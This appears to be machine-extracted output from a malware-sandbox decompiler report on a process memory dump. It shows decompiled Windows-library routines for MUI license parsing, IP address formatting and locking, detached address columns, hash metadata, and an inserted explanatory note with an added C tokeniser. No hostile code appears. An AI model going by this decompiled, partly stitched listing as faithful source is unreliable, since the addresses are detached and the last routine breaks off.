                                                    				intOrPtr _t231;
                                                    				short* _t235;
                                                    				intOrPtr _t257;
                                                    				short* _t261;
                                                    				intOrPtr _t284;
                                                    				intOrPtr _t288;
                                                    				void* _t314;
                                                    				signed int _t318;
                                                    				short* _t319;
                                                    				intOrPtr _t321;
                                                    				void* _t328;
                                                    				void* _t329;
                                                    				char* _t332;
                                                    				signed int _t333;
                                                    				signed int* _t334;
                                                    				void* _t335;
                                                    				void* _t338;
                                                    				void* _t339;
                                                    
                                                    				_t328 = __edx;
                                                    				_t322 = __ecx;
                                                    				_t318 = 0;
                                                    				_t334 = _a4;
                                                    				_v8 = 0;
                                                    				_v28 = 0;
                                                    				_v48 = 0;
                                                    				_v20 = 0;
                                                    				_v40 = 0;
                                                    				_v32 = 0;
                                                    				_v52 = 0;
                                                    				if(_t334 == 0) {
                                                    					_t329 = 0xc000000d;
                                                    					L49:
                                                    					_t334[0x11] = _v56;
                                                    					 *_t334 =  *_t334 | 0x00000800;
                                                    					_t334[0x12] = _v60;
                                                    					_t334[0x13] = _v28;
                                                    					_t334[0x17] = _v20;
                                                    					_t334[0x16] = _v48;
                                                    					_t334[0x18] = _v40;
                                                    					_t334[0x14] = _v32;
                                                    					_t334[0x15] = _v52;
                                                    					return _t329;
                                                    				}
                                                    				_v56 = 0;
                                                    				if(E00908460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                    					_v56 = 1;
                                                    					if(_v8 != 0) {
                                                    						_t207 = E008EE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                    					}
                                                    					_push(1);
                                                    					_v8 = _t318;
                                                    					E0090718A(_t207);
                                                    					_t335 = _t335 + 4;
                                                    				}
                                                    				_v60 = _v60 | 0xffffffff;
                                                    				if(E00908460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                    					_t333 =  *_v8;
                                                    					_v60 = _t333;
                                                    					_t314 = E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                    					_push(_t333);
                                                    					_v8 = _t318;
                                                    					E0090718A(_t314);
                                                    					_t335 = _t335 + 4;
                                                    				}
                                                    				_t216 = E00908460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                    				_t332 = ";";
                                                    				if(_t216 < 0) {
                                                    					L17:
                                                    					if(E00908460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                    						L30:
                                                    						if(E00908460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                    							L46:
                                                    							_t329 = 0;
                                                    							L47:
                                                    							if(_v8 != _t318) {
                                                    								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                    							}
                                                    							if(_v28 != _t318) {
                                                    								if(_v20 != _t318) {
                                                    									E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                    									_v20 = _t318;
                                                    									_v40 = _t318;
                                                    								}
                                                    							}
                                                    							goto L49;
                                                    						}
                                                    						_t231 = _v24;
                                                    						_t322 = _t231 + 4;
                                                    						_push(_t231);
                                                    						_v52 = _t322;
                                                    						E0090718A(_t231);
                                                    						if(_t322 == _t318) {
                                                    							_v32 = _t318;
                                                    						} else {
                                                    							_v32 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                    						}
                                                    						if(_v32 == _t318) {
                                                    							_v52 = _t318;
                                                    							L58:
                                                    							_t329 = 0xc0000017;
                                                    							goto L47;
                                                    						} else {
                                                    							E008E2340(_v32, _v8, _v24);
                                                    							_v16 = _v32;
                                                    							_a4 = _t318;
                                                    							_t235 = E008FE679(_v32, _t332);
                                                    							while(1) {
                                                    								_t319 = _t235;
                                                    								if(_t319 == 0) {
                                                    									break;
                                                    								}
                                                    								 *_t319 = 0;
                                                    								_t321 = _t319 + 2;
                                                    								E008EE2A8(_t322,  &_v68, _v16);
                                                    								if(E00905553(_t328,  &_v68,  &_v36) != 0) {
                                                    									_a4 = _a4 + 1;
                                                    								}
                                                    								_v16 = _t321;
                                                    								_t235 = E008FE679(_t321, _t332);
                                                    								_pop(_t322);
                                                    							}
                                                    							_t236 = _v16;
                                                    							if( *_v16 != _t319) {
                                                    								E008EE2A8(_t322,  &_v68, _t236);
                                                    								if(E00905553(_t328,  &_v68,  &_v36) != 0) {
                                                    									_a4 = _a4 + 1;
                                                    								}
                                                    							}
                                                    							if(_a4 == 0) {
                                                    								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                    								_v52 = _v52 & 0x00000000;
                                                    								_v32 = _v32 & 0x00000000;
                                                    							}
                                                    							if(_v8 != 0) {
                                                    								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                    							}
                                                    							_v8 = _v8 & 0x00000000;
                                                    							_t318 = 0;
                                                    							goto L46;
                                                    						}
                                                    					}
                                                    					_t257 = _v24;
                                                    					_t322 = _t257 + 4;
                                                    					_push(_t257);
                                                    					_v40 = _t322;
                                                    					E0090718A(_t257);
                                                    					_t338 = _t335 + 4;
                                                    					if(_t322 == _t318) {
                                                    						_v20 = _t318;
                                                    					} else {
                                                    						_v20 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                    					}
                                                    					if(_v20 == _t318) {
                                                    						_v40 = _t318;
                                                    						goto L58;
                                                    					} else {
                                                    						E008E2340(_v20, _v8, _v24);
                                                    						_v16 = _v20;
                                                    						_a4 = _t318;
                                                    						_t261 = E008FE679(_v20, _t332);
                                                    						_t335 = _t338 + 0x14;
                                                    						while(1) {
                                                    							_v12 = _t261;
                                                    							if(_t261 == _t318) {
                                                    								break;
                                                    							}
                                                    							_v12 = _v12 + 2;
                                                    							 *_v12 = 0;
                                                    							E008EE2A8(_v12,  &_v68, _v16);
                                                    							if(E00905553(_t328,  &_v68,  &_v36) != 0) {
                                                    								_a4 = _a4 + 1;
                                                    							}
                                                    							_v16 = _v12;
                                                    							_t261 = E008FE679(_v12, _t332);
                                                    							_pop(_t322);
                                                    						}
                                                    						_t269 = _v16;
                                                    						if( *_v16 != _t318) {
                                                    							E008EE2A8(_t322,  &_v68, _t269);
                                                    							if(E00905553(_t328,  &_v68,  &_v36) != 0) {
                                                    								_a4 = _a4 + 1;
                                                    							}
                                                    						}
                                                    						if(_a4 == _t318) {
                                                    							E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                    							_v40 = _t318;
                                                    							_v20 = _t318;
                                                    						}
                                                    						if(_v8 != _t318) {
                                                    							E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                    						}
                                                    						_v8 = _t318;
                                                    						goto L30;
                                                    					}
                                                    				}
                                                    				_t284 = _v24;
                                                    				_t322 = _t284 + 4;
                                                    				_push(_t284);
                                                    				_v48 = _t322;
                                                    				E0090718A(_t284);
                                                    				_t339 = _t335 + 4;
                                                    				if(_t322 == _t318) {
                                                    					_v28 = _t318;
                                                    				} else {
                                                    					_v28 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                    				}
                                                    				if(_v28 == _t318) {
                                                    					_v48 = _t318;
                                                    					goto L58;
                                                    				} else {
                                                    					E008E2340(_v28, _v8, _v24);
                                                    					_v16 = _v28;
                                                    					_a4 = _t318;
                                                    					_t288 = E008FE679(_v28, _t332);
                                                    					_t335 = _t339 + 0x14;
                                                    					while(1) {
                                                    						_v12 = _t288;
                                                    						if(_t288 == _t318) {
                                                    							break;
                                                    						}
                                                    						_v12 = _v12 + 2;
                                                    						 *_v12 = 0;
                                                    						E008EE2A8(_v12,  &_v68, _v16);
                                                    						if(E00905553(_t328,  &_v68,  &_v36) != 0) {
                                                    							_a4 = _a4 + 1;
                                                    						}
                                                    						_v16 = _v12;
                                                    						_t288 = E008FE679(_v12, _t332);
                                                    						_pop(_t322);
                                                    					}
                                                    					_t296 = _v16;
                                                    					if( *_v16 != _t318) {
                                                    						E008EE2A8(_t322,  &_v68, _t296);
                                                    						if(E00905553(_t328,  &_v68,  &_v36) != 0) {
                                                    							_a4 = _a4 + 1;
                                                    						}
                                                    					}
                                                    					if(_a4 == _t318) {
                                                    						E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                    						_v48 = _t318;
                                                    						_v28 = _t318;
                                                    					}
                                                    					if(_v8 != _t318) {
                                                    						E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                    					}
                                                    					_v8 = _t318;
                                                    					goto L17;
                                                    				}
                                                    			}
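Reading note on the decompiled routine above: the four string constants are license values, and the loop body is a plain in-place tokeniser: find the next L';' (E008FE679 is used like wcschr), overwrite it with a NUL, hand the segment before it to a validator (E00905553), then continue one UTF-16 unit past the separator (the "+ 2" bytes). The final "if (*_v16 != ...)" after each loop handles the last segment, which has no trailing ';'. The expression *((*[fs:0x18] + 0x30) + 0x18) is TEB -> PEB -> ProcessHeap, so E008EE025 is being called with the process heap as its first argument, and the two status codes are STATUS_INVALID_PARAMETER (0xC000000D, returned when the output structure pointer is NULL) and STATUS_NO_MEMORY (0xC0000017, returned when a copy buffer cannot be allocated). The C below is an added illustration written for this page, not code from the report or from the sample; it re-implements only the tokenise-and-count step. The validator is a hypothetical stand-in for E00905553 whose real acceptance rule the report does not show.

```c
#include <stddef.h>
#include <string.h>
#include <wchar.h>

/* Added illustration, not code from the report. Assumptions: E008FE679
 * behaves like wcschr(), E00905553 is a per-entry validator, and the
 * "+ 2" in the decompile advances one wchar_t past the ';'. */

typedef int (*entry_validator_t)(const wchar_t *entry);

/* Hypothetical validator standing in for E00905553: accept non-empty
 * entries made only of letters, digits and '-' (a BCP-47-like shape). */
static int looks_like_language_tag(const wchar_t *entry)
{
    if (entry == NULL || *entry == L'\0')
        return 0;
    for (const wchar_t *p = entry; *p; ++p) {
        int ok = (*p >= L'a' && *p <= L'z') || (*p >= L'A' && *p <= L'Z')
              || (*p >= L'0' && *p <= L'9') || *p == L'-';
        if (!ok)
            return 0;
    }
    return 1;
}

/* Mirrors the decompiled loop: locate ';', replace it with L'\0',
 * validate the segment before it, continue after it. The segment after
 * the last ';' is handled by the trailing check, exactly as the
 * decompile does with "if (*_v16 != 0)". The buffer is modified in place,
 * which is why the original first copies the license blob (E008E2340)
 * into a freshly allocated buffer. */
size_t count_valid_entries(wchar_t *list, entry_validator_t validate)
{
    size_t accepted = 0;
    wchar_t *cursor = list;
    wchar_t *sep;

    if (list == NULL)
        return 0;

    while ((sep = wcschr(cursor, L';')) != NULL) {
        *sep = L'\0';            /* terminate the current segment */
        if (validate(cursor))
            ++accepted;
        cursor = sep + 1;        /* "+2" bytes in the decompile == one wchar_t */
    }
    if (*cursor != L'\0' && validate(cursor))   /* trailing segment, no ';' */
        ++accepted;
    return accepted;
}

/* Convenience wrapper: copies a constant list into a writable buffer
 * (as the original copies the license value) and counts valid entries.
 * Returns 0 for lists that do not fit; the original returns
 * STATUS_NO_MEMORY in the analogous allocation-failure path. */
size_t count_valid_entries_in(const wchar_t *list)
{
    wchar_t buf[256];
    size_t n = wcslen(list);
    if (n >= sizeof buf / sizeof buf[0])
        return 0;
    memcpy(buf, list, (n + 1) * sizeof(wchar_t));
    return count_valid_entries(buf, looks_like_language_tag);
}
```

The constructed inputs in the test cover the three shapes the decompile has to handle: a normal list, empty segments produced by doubled or trailing separators (rejected by the validator, so they do not count), and a list with no separator at all, which is consumed entirely by the post-loop check. In the original, a count of zero leads to the copied buffer being freed and the corresponding output slot left NULL, so an entirely invalid list behaves the same as an absent one.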
                                                    0x00908788
                                                    0x00908788
                                                    0x00908791
                                                    0x00908794
                                                    0x00908798
                                                    0x0090879b
                                                    0x0090879e
                                                    0x009087a1
                                                    0x009087a4
                                                    0x009087a7
                                                    0x009087aa
                                                    0x009087af
                                                    0x00951ad3
                                                    0x00908b0a
                                                    0x00908b0d
                                                    0x00908b13
                                                    0x00908b19
                                                    0x00908b1f
                                                    0x00908b25
                                                    0x00908b2b
                                                    0x00908b31
                                                    0x00908b37
                                                    0x00908b3d
                                                    0x00908b46
                                                    0x00908b46
                                                    0x009087c6
                                                    0x009087d0
                                                    0x00951ae0
                                                    0x00951ae6
                                                    0x00951af8
                                                    0x00951af8
                                                    0x00951afd
                                                    0x00951afe
                                                    0x00951b01
                                                    0x00951b06
                                                    0x00951b06
                                                    0x009087d6
                                                    0x009087f2
                                                    0x009087f7
                                                    0x00908807
                                                    0x0090880a
                                                    0x0090880f
                                                    0x00908810
                                                    0x00908813
                                                    0x00908818
                                                    0x00908818
                                                    0x0090882c
                                                    0x00908831
                                                    0x00908838
                                                    0x00908908
                                                    0x00908920
                                                    0x009089f0
                                                    0x00908a08
                                                    0x00908af6
                                                    0x00908af6
                                                    0x00908af8
                                                    0x00908afb
                                                    0x00951beb
                                                    0x00951beb
                                                    0x00908b04
                                                    0x00951bf8
                                                    0x00951c0e
                                                    0x00951c13
                                                    0x00951c16
                                                    0x00951c16
                                                    0x00951bf8
                                                    0x00000000
                                                    0x00908b04
                                                    0x00908a0e
                                                    0x00908a11
                                                    0x00908a14
                                                    0x00908a15
                                                    0x00908a18
                                                    0x00908a22
                                                    0x00908b59
                                                    0x00908a28
                                                    0x00908a3c
                                                    0x00908a3c
                                                    0x00908a42
                                                    0x00951bb0
                                                    0x00951b11
                                                    0x00951b11
                                                    0x00000000
                                                    0x00908a48
                                                    0x00908a51
                                                    0x00908a5b
                                                    0x00908a5e
                                                    0x00908a61
                                                    0x00908a69
                                                    0x00908a69
                                                    0x00908a6d
                                                    0x00000000
                                                    0x00000000
                                                    0x00908a74
                                                    0x00908a7c
                                                    0x00908a7d
                                                    0x00908a91
                                                    0x00908a93
                                                    0x00908a93
                                                    0x00908a98
                                                    0x00908a9b
                                                    0x00908aa1
                                                    0x00908aa1
                                                    0x00908aa4
                                                    0x00908aaa
                                                    0x00908ab1
                                                    0x00908ac5
                                                    0x00908ac7
                                                    0x00908ac7
                                                    0x00908ac5
                                                    0x00908ace
                                                    0x00951bc9
                                                    0x00951bce
                                                    0x00951bd2
                                                    0x00951bd2
                                                    0x00908ad8
                                                    0x00908aeb
                                                    0x00908aeb
                                                    0x00908af0
                                                    0x00908af4
                                                    0x00000000
                                                    0x00908af4
                                                    0x00908a42
                                                    0x00908926
                                                    0x00908929
                                                    0x0090892c
                                                    0x0090892d
                                                    0x00908930
                                                    0x00908935
                                                    0x0090893a
                                                    0x00908b51
                                                    0x00908940
                                                    0x00908954
                                                    0x00908954
                                                    0x0090895a
                                                    0x00951b63
                                                    0x00000000
                                                    0x00908960
                                                    0x00908969
                                                    0x00908973
                                                    0x00908976
                                                    0x00908979
                                                    0x0090897e
                                                    0x00908981
                                                    0x00908981
                                                    0x00908986
                                                    0x00000000
                                                    0x00000000
                                                    0x00951b6e
                                                    0x00951b74
                                                    0x00951b7b
                                                    0x00951b8f
                                                    0x00951b91
                                                    0x00951b91
                                                    0x00951b99
                                                    0x00951b9c
                                                    0x00951ba2
                                                    0x00951ba2
                                                    0x0090898c
                                                    0x00908992
                                                    0x00908999
                                                    0x009089ad
                                                    0x00951ba8
                                                    0x00951ba8
                                                    0x009089ad
                                                    0x009089b6
                                                    0x009089c8
                                                    0x009089cd
                                                    0x009089d0
                                                    0x009089d0
                                                    0x009089d6
                                                    0x009089e8
                                                    0x009089e8
                                                    0x009089ed
                                                    0x00000000
                                                    0x009089ed
                                                    0x0090895a
                                                    0x0090883e
                                                    0x00908841
                                                    0x00908844
                                                    0x00908845
                                                    0x00908848
                                                    0x0090884d
                                                    0x00908852
                                                    0x00908b49
                                                    0x00908858
                                                    0x0090886c
                                                    0x0090886c
                                                    0x00908872
                                                    0x00951b0e
                                                    0x00000000
                                                    0x00908878
                                                    0x00908881
                                                    0x0090888b
                                                    0x0090888e
                                                    0x00908891
                                                    0x00908896
                                                    0x00908899
                                                    0x00908899
                                                    0x0090889e
                                                    0x00000000
                                                    0x00000000
                                                    0x00951b21
                                                    0x00951b27
                                                    0x00951b2e
                                                    0x00951b42
                                                    0x00951b44
                                                    0x00951b44
                                                    0x00951b4c
                                                    0x00951b4f
                                                    0x00951b55
                                                    0x00951b55
                                                    0x009088a4
                                                    0x009088aa
                                                    0x009088b1
                                                    0x009088c5
                                                    0x00951b5b
                                                    0x00951b5b
                                                    0x009088c5
                                                    0x009088ce
                                                    0x009088e0
                                                    0x009088e5
                                                    0x009088e8
                                                    0x009088e8
                                                    0x009088ee
                                                    0x00908900
                                                    0x00908900
                                                    0x00908905
                                                    0x00000000
                                                    0x00908905

                                                    APIs
                                                    Strings
                                                    • Kernel-MUI-Language-SKU, xrefs: 009089FC
                                                    • WindowsExcludedProcs, xrefs: 009087C1
                                                    • Kernel-MUI-Language-Allowed, xrefs: 00908827
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00908914
                                                    • Kernel-MUI-Number-Allowed, xrefs: 009087E6
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: _wcspbrk
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 402402107-258546922
                                                    • Opcode ID: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
                                                    • Instruction ID: d5b8b31f5906aec0b39d198ffaf365a0d44bee7c5842811dc6851a4495d599da
                                                    • Opcode Fuzzy Hash: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
                                                    • Instruction Fuzzy Hash: 01F1F8B2D00649EFCF11EF99C981AEEBBB8FF08300F14446AE515E7251EB349A45DB61
                                                    Uniqueness
                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 38%
                                                    			E009213CB(intOrPtr* _a4, intOrPtr _a8) {
                                                    				char _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr* _v16;
                                                    				intOrPtr _v20;
                                                    				char _v24;
                                                    				intOrPtr _t71;
                                                    				signed int _t78;
                                                    				signed int _t86;
                                                    				char _t90;
                                                    				signed int _t91;
                                                    				signed int _t96;
                                                    				intOrPtr _t108;
                                                    				signed int _t114;
                                                    				void* _t115;
                                                    				intOrPtr _t128;
                                                    				intOrPtr* _t129;
                                                    				void* _t130;
                                                    
                                                    				_t129 = _a4;
                                                    				_t128 = _a8;
                                                    				_t116 = 0;
                                                    				_t71 = _t128 + 0x5c;
                                                    				_v8 = 8;
                                                    				_v20 = _t71;
                                                    				if( *_t129 == 0) {
                                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                    						goto L5;
                                                    					} else {
                                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                    						if(_t96 != 0) {
                                                    							L38:
                                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                    								goto L5;
                                                    							} else {
                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                    								_t86 = E00917707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                    								L36:
                                                    								return _t128 + _t86 * 2;
                                                    							}
                                                    						}
                                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                    						if(_t114 == 0) {
                                                    							L33:
                                                    							_t115 = 0x8e2926;
                                                    							L35:
                                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                                    							_t86 = E00917707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                    							goto L36;
                                                    						}
                                                    						if(_t114 != 0xffff) {
                                                    							_t116 = 0;
                                                    							goto L38;
                                                    						}
                                                    						if(_t114 != 0) {
                                                    							_t115 = 0x8e9cac;
                                                    							goto L35;
                                                    						}
                                                    						goto L33;
                                                    					}
                                                    				} else {
                                                    					L5:
                                                    					_a8 = _t116;
                                                    					_a4 = _t116;
                                                    					_v12 = _t116;
                                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                                    							_v8 = 6;
                                                    						}
                                                    					}
                                                    					_t90 = _v8;
                                                    					if(_t90 <= _t116) {
                                                    						L11:
                                                    						if(_a8 - _a4 <= 1) {
                                                    							_a8 = _t116;
                                                    							_a4 = _t116;
                                                    						}
                                                    						_t91 = 0;
                                                    						if(_v8 <= _t116) {
                                                    							L22:
                                                    							if(_v8 < 8) {
                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                    								_t128 = _t128 + E00917707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                    							}
                                                    							return _t128;
                                                    						} else {
                                                    							L14:
                                                    							if(_a4 > _t91 || _t91 >= _a8) {
                                                    								if(_t91 != _t116 && _t91 != _a8) {
                                                    									_push(":");
                                                    									_push(_t71 - _t128 >> 1);
                                                    									_push(_t128);
                                                    									_t128 = _t128 + E00917707() * 2;
                                                    									_t71 = _v20;
                                                    									_t130 = _t130 + 0xc;
                                                    								}
                                                    								_t78 = E00917707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                    								_t130 = _t130 + 0x10;
                                                    							} else {
                                                    								_push(L"::");
                                                    								_push(_t71 - _t128 >> 1);
                                                    								_push(_t128);
                                                    								_t78 = E00917707();
                                                    								_t130 = _t130 + 0xc;
                                                    								_t91 = _a8 - 1;
                                                    							}
                                                    							_t91 = _t91 + 1;
                                                    							_t128 = _t128 + _t78 * 2;
                                                    							_t71 = _v20;
                                                    							if(_t91 >= _v8) {
                                                    								goto L22;
                                                    							}
                                                    							_t116 = 0;
                                                    							goto L14;
                                                    						}
                                                    					} else {
                                                    						_t108 = 1;
                                                    						_v16 = _t129;
                                                    						_v24 = _t90;
                                                    						do {
                                                    							if( *_v16 == _t116) {
                                                    								if(_t108 - _v12 > _a8 - _a4) {
                                                    									_a4 = _v12;
                                                    									_a8 = _t108;
                                                    								}
                                                    								_t116 = 0;
                                                    							} else {
                                                    								_v12 = _t108;
                                                    							}
                                                    							_v16 = _v16 + 2;
                                                    							_t108 = _t108 + 1;
                                                    							_t26 =  &_v24;
                                                    							 *_t26 = _v24 - 1;
                                                    						} while ( *_t26 != 0);
                                                    						goto L11;
                                                    					}
                                                    				}
                                                    			}

                                                    Instruction address column (detached from the listing above during extraction): addresses 0x009213d5 to 0x00921470, with out-of-line blocks at 0x0094e8fd to 0x0094ea05.
                                                    0x00921473
                                                    0x00921476
                                                    0x00921476
                                                    0x00921490
                                                    0x00921495
                                                    0x0092138e
                                                    0x00921390
                                                    0x00921397
                                                    0x00921398
                                                    0x00921399
                                                    0x009213a1
                                                    0x009213a4
                                                    0x009213a4
                                                    0x00921498
                                                    0x0092149c
                                                    0x0092149f
                                                    0x009214a2
                                                    0x00000000
                                                    0x00000000
                                                    0x009214a4
                                                    0x00000000
                                                    0x009214a4
                                                    0x00921413
                                                    0x00921415
                                                    0x00921416
                                                    0x00921419
                                                    0x0092141c
                                                    0x00921422
                                                    0x009213b7
                                                    0x009213bc
                                                    0x009213bf
                                                    0x009213bf
                                                    0x009213c2
                                                    0x00921424
                                                    0x00921424
                                                    0x00921424
                                                    0x00921427
                                                    0x0092142b
                                                    0x0092142c
                                                    0x0092142c
                                                    0x0092142c
                                                    0x00000000
                                                    0x0092141c
                                                    0x00921411

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
                                                    • Instruction ID: fa12d8b7a289918ab0646b0c93a12e58c6cad99d3e65512d48ca47a8b15c9844
                                                    • Opcode Fuzzy Hash: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
                                                    • Instruction Fuzzy Hash: 1B614B71A04665A6CF34DF99D8808BEBBBAFFE5300B14C42DF4DA47684D374AA50CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 49%
                                                    			E00920554(signed int _a4, char _a8) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int* _t49;
                                                    				signed int _t51;
                                                    				signed int _t56;
                                                    				signed int _t58;
                                                    				signed int _t61;
                                                    				signed int _t63;
                                                    				void* _t66;
                                                    				intOrPtr _t67;
                                                    				signed int _t70;
                                                    				void* _t75;
                                                    				signed int _t81;
                                                    				signed int _t84;
                                                    				void* _t86;
                                                    				signed int _t93;
                                                    				signed int _t96;
                                                    				intOrPtr _t105;
                                                    				signed int _t107;
                                                    				void* _t110;
                                                    				signed int _t115;
                                                    				signed int* _t119;
                                                    				void* _t125;
                                                    				void* _t126;
                                                    				signed int _t128;
                                                    				signed int _t130;
                                                    				signed int _t138;
                                                    				signed int _t144;
                                                    				void* _t158;
                                                    				void* _t159;
                                                    				void* _t160;
                                                    
                                                    				_t96 = _a4;
                                                    				_t115 =  *(_t96 + 0x28);
                                                    				_push(_t138);
                                                    				if(_t115 < 0) {
                                                    					_t105 =  *[fs:0x18];
                                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                    						goto L6;
                                                    					} else {
                                                    						__eflags = _t115 | 0xffffffff;
                                                    						asm("lock xadd [eax], edx");
                                                    						return 1;
                                                    					}
                                                    				} else {
                                                    					L6:
                                                    					_push(_t128);
                                                    					while(1) {
                                                    						L7:
                                                    						__eflags = _t115;
                                                    						if(_t115 >= 0) {
                                                    							break;
                                                    						}
                                                    						__eflags = _a8;
                                                    						if(_a8 == 0) {
                                                    							__eflags = 0;
                                                    							return 0;
                                                    						} else {
                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                    							_t49 = _t96 + 0x1c;
                                                    							_t106 = 1;
                                                    							asm("lock xadd [edx], ecx");
                                                    							_t115 =  *(_t96 + 0x28);
                                                    							__eflags = _t115;
                                                    							if(_t115 < 0) {
                                                    								L23:
                                                    								_t130 = 0;
                                                    								__eflags = 0;
                                                    								while(1) {
                                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                    									asm("sbb esi, esi");
                                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009c01c0;
                                                    									_push(_t144);
                                                    									_push(0);
